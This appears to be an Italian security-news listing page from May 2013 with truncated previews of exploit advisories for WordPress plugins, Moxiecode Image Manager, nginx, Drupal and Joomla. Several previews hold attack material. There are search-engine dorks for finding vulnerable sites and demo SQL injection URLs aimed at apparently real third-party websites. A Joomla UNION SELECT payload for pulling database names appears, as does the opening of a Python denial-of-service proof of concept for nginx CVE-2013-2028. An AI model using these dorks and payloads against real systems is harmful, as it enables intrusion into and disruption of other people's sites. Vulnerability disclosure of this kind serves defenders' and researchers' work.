Author: Janek Vind "waraxe" Date: 22. May 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-105.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spider Catalog is the best WordPress catalog plugin. It is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes it easier for the customers to search and identify the needed products within the catalog. http://wordpress.org/extend/plugins/catalog/ http://web-dorado.com/products/wordpress-catalog.html Vulnerable is current version 1.4.6, older versions...
Leggi il seguito »
WordPress Spider Catalog Multiple Vulnerabilities
WordPress Spider Event Calendar Multiple Vulnerabilities
22 maggio 2013 - Fonte: http://www.mondounix.com
Author: Janek Vind "waraxe" Date: 22. May 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-104.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spider Event Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendar available in WordPress Directory. If you have problem with organizing your WordPress Calendar events and displaying them in a calendar format, then Spider WordPress Calendar Plugin is the best solution. http://wordpress.org/extend/plugins/spider-event-calendar/ http://web-dorado.com/products/wordpress-calendar.html Vulnerable...
Leggi il seguito »
WordPress Flagallery-Skins SQL Injection
22 maggio 2013 - Fonte: http://www.mondounix.com
############## # Exploit Title : Wordpress Flagallery-skins plugin SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # Home : www.ashiyane.org # # Security Risk : Medium # # Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist= # # Tested on: Linux # ############## #Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL] # # #DEm0: # http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27 # # http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27 # # http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27 # #...
Leggi il seguito »
Moxiecode Image Manager 3.1.5 Shell Upload
21 maggio 2013 - Fonte: http://www.mondounix.com
I want to warn you about vulnerabilities in Moxiecode Image Manager (MCImageManager). This is commercial plugin for TinyMCE. It concerns as MCImageManager, as all web applications which have MCImageManager in their bundle. These are Arbitrary File Uploading vulnerabilities, which lead to Code Execution on IIS and Apache web servers. ------------------------- Affected products: ------------------------- Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions. ------------------------- Affected vendors: ------------------------- Moxiecode http://www.moxiecode.com ---------- Details: ---------- Arbitrary File Uploading (WASC-31): http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html Execution...
Leggi il seguito »
Nginx 1.3.9 / 1.4.0 Denial Of Service
21 maggio 2013 - Fonte: http://www.mondounix.com
# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028)
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & Windows XP (nginx v1.4.0)
# CVE : CVE-2013-2028
import httplib
import time
import socket
import sys
import os
# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
packet = 0
def chunk(data, chunk_size):
chunked = ""
chunked += "%s\r\n" % (chunk_size)
chunked += "%s\r\n" % (data)
chunked +=...
Leggi il seguito »
WordPress ProPlayer Plugin SQL Injection
21 maggio 2013 - Fonte: http://www.mondounix.com
############## # Exploit Title : WordPress ProPlayer Plugin SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # Plugin Link : http://wordpress.org/plugins/proplayer/ # # Home : www.ashiyane.org # # Security Risk : High # # Version : 4.7.9.1 # # Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id= # # Tested on: Linux # ############## #Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL] # # #DEm0: # http://www.andrewardizzoia.info/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27 # # http://www.straightlinehdd.com/en/fear-no-ground/wp-content/plugins/proplayer/playlist-controller.php?id=151-0%27 # # http://djmikewallace.com/wp-content/plugins/proplayer/playlist-controller.php?id=42-0%27 # #...
Leggi il seguito »
Drupal 6.x/7.x Google Authenticator login Access Bypass
18 maggio 2013 - Fonte: http://www.mondounix.com
Advisory ID: DRUPAL-SA-CONTRIB-2013-047
Project: Google Authenticator login (third-party module)
Version: 6.x, 7.x
Date: 2013-May-15
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Access bypass
Description
This module will allow you to add Time-based One-time Password Algorithm (also called "Two Step Authentication" or "Multi-Factor Authentication") support to user logins. It works with Google's Authenticator app system and support most (if not all) OATH based HOTP/TOTP systems.
Accidental removal of account configuration.
In certain scenarios, Google Authenticator login incorrectly determines the user's account name. The...
Leggi il seguito »
Drupal CMS 7.12 Multiple Vulnerabilities
18 maggio 2013 - Fonte: http://www.mondounix.com
# Exploit Title : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities # Date : 02-03-2012 # Author : Ivano Binetti (http://ivanobinetti.com) # Software link : http://ftp.drupal.org/files/projects/drupal-7.12.zip # Vendor site : http://drupal.org # Version : 7.12 (and lower) # Tested on : Debian Squeeze (6.0) # Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html # EDB-ID : 18564 (http://www.exploit-db.com/exploits/18564/) # Other Advisory : http://packetstormsecurity.org/files/110404/Drupal-CMS-7.12-Cross-Site-Request-Forgery.html # Other Advisory : http://www.1337day.com/exploits/17611 +---------------------------------------------------------------------------------------------------------------------------------------------------+ +-------------------------[Multiple...
Leggi il seguito »
Joomla Discussions SQL Injection
17 maggio 2013 - Fonte: http://www.mondounix.com
# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability # Author : Red Security TEAM # Date : 17/01/2012 # Risk : High # Software : http://extensions.joomla.org/extensions/communication/forum/13560 # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi] # # Example : # # 1. [Get Database Name] # http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a # 2. [Get Tables Name] #...
Leggi il seguito »
